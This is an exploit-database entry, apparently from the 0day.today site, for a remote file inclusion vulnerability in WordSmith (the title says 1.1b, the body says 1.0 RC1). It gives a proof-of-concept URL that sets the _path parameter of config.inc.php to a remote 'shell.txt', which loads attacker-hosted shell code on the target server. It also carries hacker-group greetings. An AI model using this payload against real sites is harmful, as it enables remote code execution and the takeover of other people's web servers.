[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Wordsmith 1.1b (config.inc.php _path) Remote File Inclusion Vuln

Author
ShockShadow
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2163
Category
web applications
Date add
22-09-2007
Platform
unsorted
================================================================
Wordsmith 1.1b (config.inc.php _path) Remote File Inclusion Vuln
================================================================



--==+=================== Electronic Security Team (www.Yee7.com) ====================+==--
--==+            WordSmith 1.0 RC1 (config.inc.php) Remote File Inclusion            +==--
--==+================================================================================+==--

Software:     WordSmith 1.0 RC1
exploit:      Remote File Inclusion [High Risk]
By:           ShockShadow - Electronic Security Team (www.Yee7.com)

##############################

==============
Dork: built in ;)

PoC:
http://domain.com/Script_Path/config.inc.php?_path=http://shell.txt?
###############################

by: ShockShadow
Thanks to: Mr-m07, Al-Shikh, ThE WhitE WolF, HuRrIcAnE, S0m.Ph, KEENEST, Qanas Alyahood, Falcon Hammdan, ArabHacker
AND ALL FRIENDS 



#  0day.today [2024-12-25]  #